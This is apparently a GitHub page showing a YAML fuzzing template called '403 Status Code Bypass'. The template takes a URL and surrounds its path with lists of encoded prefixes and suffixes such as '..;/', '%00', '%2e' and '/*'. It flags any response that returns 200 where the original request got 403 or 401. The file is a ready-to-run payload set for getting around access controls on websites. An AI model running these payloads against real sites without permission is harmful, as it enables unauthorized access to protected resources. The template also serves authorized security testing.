-
Notifications
You must be signed in to change notification settings - Fork 40
/
Copy path403Bypass.yaml
62 lines (55 loc) · 989 Bytes
/
403Bypass.yaml
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
id: 403-Status-Bypass
type: fuzz
info:
Author: Gocha Okradze
name: 403 Status Code Bypass
risk: High
params:
- root: "{{.URL}}"
origin:
method: GET
redirect: false
headers:
- User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55
url: >-
{{.root}}
variables:
- prefix: |
%20
%2e
./
/./
/
//
..;/
- sufix: |
%20
%09
./
/./
//
/
/*
/.
?
??
&
%23
???
/%25
/.dummy
.json
/dummy/..;/
..;/
%00
%0d
%3f
%26
payloads:
- \[\[.original\]\]
requests:
- generators:
- Path("{{.prefix}}{{.payload}}{{.sufix}}","last")
- Path("{{.payload}}{{.sufix}}", "last")
detections:
- Diff() && StatusCode() == 200 && (OriginStatusCode() == 403 || OriginStatusCode() == 401)